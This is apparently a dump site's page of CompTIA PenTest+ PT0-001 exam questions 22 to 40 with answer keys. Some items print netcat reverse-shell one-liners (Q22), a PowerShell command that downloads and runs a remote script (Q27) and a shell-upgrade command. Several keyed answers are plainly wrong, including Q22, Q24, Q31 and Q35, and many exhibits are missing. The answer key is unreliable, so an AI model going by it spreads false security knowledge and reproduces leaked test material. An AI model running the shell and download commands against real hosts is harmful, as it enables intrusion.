PT0-001 PDF Dumps Feb 07, 2022 Exam Questions – Valid PT0-001 Dumps [Q22-Q40]


Ultimate PT0-001 Guide to Prepare Free Latest CompTIA Practice Tests Dumps


The CompTIA PT0-001 certification exam validates the knowledge and skills needed to plan and scope assessments, carry out penetration testing and vulnerability scanning with the use of the relevant techniques and tools. To develop these skills and pass the test, the candidates must understand the topics covered in it. They are as follows:

  • Information Gathering & Vulnerability Identification: 22%

    The potential candidates must be able to demonstrate the capability to carry out information gathering through the use of the relevant techniques, carry out a vulnerability scan, and analyze the vulnerability scan results. They should also be able to describe the process involved in leveraging information to prepare for exploitation and the weaknesses associated with specialized systems.

  • Attacks & Exploits: 30%

    This topic requires that the learners develop competence in comparing and contrasting social engineering attacks as well as exploiting various network-based, RF-based, and wireless vulnerabilities, different app-based vulnerabilities, and local host vulnerabilities. Summarizing physical security attacks associated with facilities and carrying out post-exploitation methods are the skills that you need to have as well.

  • Reporting & Communication: 16%

    This section requires that the test takers have competence in applying report writing and handling best practices, describing post-report delivery events, recommending mitigation strategies for identified vulnerabilities, and describing the significance of communication in the process of penetration testing.

  • Planning & Scoping: 15%

    This subject area measures the competence of the applicants in explaining the significance of planning for engagements as well as describing core legal concepts, the significance of scoping engagements appropriately, and the core areas of compliance-based assessments.

  • Penetration & Testing Tools: 17%

    This domain measures the ability of the students to utilize Nmap to carry out information gathering. You should also have skills in comparing and contrasting different use cases of tools, analyzing tool output related to penetration testing, and analyzing basic scripts (limited to Bash, Python, PowerShell, and Ruby).

 

NEW QUESTION 22
During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

  • A. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/tmp/f
  • B. nc -e /bin/sh 192.168.1.5 44444
  • C. nc 192.168.1.5 44444
  • D. nc -nlvp 44444 -e /bin/sh
  • E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/tmp/f
  • F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/tmp/

Answer: D,E

Explanation:
Explanation/Reference: https://www.reddit.com/r/hacking/comments/5ms9gv/help_reverse_shell_exploit/

 

NEW QUESTION 23
A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

  • A. Weak password management practices may be employed
  • B. Cryptographically weak protocols may be intercepted
  • C. Web server configurations may reveal sensitive information
  • D. Obsolete software may contain exploitable components

Answer: B

 

NEW QUESTION 24
A penetration tester runs the following from a compromised box: python -c 'import pty;pty.spawn("/bin/bash")'. Which of the following actions is the tester taking?

  • A. Upgrading the shell
  • B. Removing the Bash history
  • C. Capturing credentials
  • D. Creating a sandbox

Answer: B

 

NEW QUESTION 25
Performance based
You are a penetration tester reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.







Answer:

Explanation:
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server

 

NEW QUESTION 26
A penetration tester has been asked to conduct OS fingerprinting with Nmap using a company-provided text file that contains a list of IP addresses.
Which of the following are needed to conduct this scan? (Select TWO).

  • A. -oN
  • B. -sS
  • C. -oX
  • D. -O
  • E. -sV
  • F. -iL

Answer: D,F

 

NEW QUESTION 27
Consider the following PowerShell command:
powershell.exe IEX (New-Object Net.Webclient).downloadstring("http://site/script.ps1");Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?

  • A. Execute a remote script
  • B. Instantiate an object
  • C. Set the execution policy
  • D. Run an encoded command

Answer: A

 

NEW QUESTION 28
A penetration tester successfully exploits a Windows host and dumps the hashes. Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)

B)

C)

D)

  • A. Option C
  • B. Option B
  • C. Option A
  • D. Option D

Answer: D

 

NEW QUESTION 29
Which of the following is an example of a spear phishing attack?

  • A. Targeting random users with a USB key drop
  • B. Targeting an organization with a watering hole attack
  • C. Targeting an executive with an SMS attack
  • D. Targeting a specific team with an email attack

Answer: C

 

NEW QUESTION 30
During an engagement an unsecure direct object reference vulnerability was discovered that allows the extraction of highly sensitive PII. The tester is required to extract and then exfil the information from a web application with identifiers 1 through 1000 inclusive. When running the following script, an error is encountered:

Which of the following lines of code is causing the problem?

  • A. if req.status ==200:
  • B. url = "https://www.comptia.org?id="
  • C. url += i
  • D. req = requests.get(url)

Answer: C

 

NEW QUESTION 31
Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

  • A. Destination index register
  • B. Index pointer register
  • C. Stack base pointer
  • D. Stack pointer register

Answer: D

 

NEW QUESTION 32
A penetration tester executes the following commands:
C:\>%userprofile%\jtr.exe
This program has been blocked by group policy
C:\> accesschk.exe -w -s -q -u Users C:\Windows
rw C:\Windows\Tracing
C:\>copy %userprofile%\jtr.exe C:\Windows\Tracing
C:\Windows\Tracing\jtr.exe
jtr version 3.2...
jtr>
Which of the following is a local host vulnerability that the attacker is exploiting?

  • A. Insecure file permissions
  • B. Application Whitelisting
  • C. Writable service
  • D. Shell escape

Answer: A

Explanation:
References https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/#john-the-ripper---jtr

 

NEW QUESTION 33
A penetration tester is required to perform OSINT on staff at a target company after completing the infrastructure aspect. Which of the following would be the BEST step for penetration?

  • A. Send spoofed emails to staff to see if staff will respond with sensitive information.
  • B. Obtain staff information by calling the company and using social engineering techniques.
  • C. Visit the client and use impersonation to obtain information from staff.
  • D. Search the internet for information on staff such as social networking sites.

Answer: D

Explanation:
Explanation/Reference: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it

 

NEW QUESTION 34
A penetration tester is performing a code review. Which of the following testing techniques is being performed?

  • A. Run-time analysis
  • B. Fuzzing analysis
  • C. Static analysis
  • D. Dynamic analysis

Answer: C

Explanation:
Explanation/Reference: https://smartbear.com/learn/code-review/what-is-code-review/

 

NEW QUESTION 35
A file contains several hashes. Which of the following can be used in a pass-the-hash attack?

  • A. NTLM
  • B. NTLMv2
  • C. LMv2
  • D. Kerberos
  • E. NTLMv1

Answer: D

 

NEW QUESTION 36
Which of the following commands will allow a tester to enumerate potential unquoted services paths on a host?

  • A. wmic startup get caption, location, command | findstr /i "service" | findstr /v /i "%"
  • B. wmic environment get name, variablevalue, username / findstr /i "Path" | findstr /i "service"
  • C. wmic service get /format:hform > c:\temp\services.html
  • D. wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

Answer: D

 

NEW QUESTION 37
While reviewing logs, a web developer notices the following user input string in a field:

Which of the following types of attacks was done to the website?

  • A. Reflected XSS
  • B. Blind XSS
  • C. XSS injection
  • D. Persistent XSS

Answer: C

 

NEW QUESTION 38
Click the exhibit button.

A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?

  • A. SMTP relay
  • B. SNMP brute forcing
  • C. ARP spoofing
  • D. DNS cache poisoning

Answer: B

 

NEW QUESTION 39
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.








Answer:

Explanation:
Step 1 - Generate a Certificate Signing Request
Step 2 - Submit CSR to the CA
Step 3 - Install re-issued certificate on the server
Step 4 - Remove Certificate from Server

 

NEW QUESTION 40
......
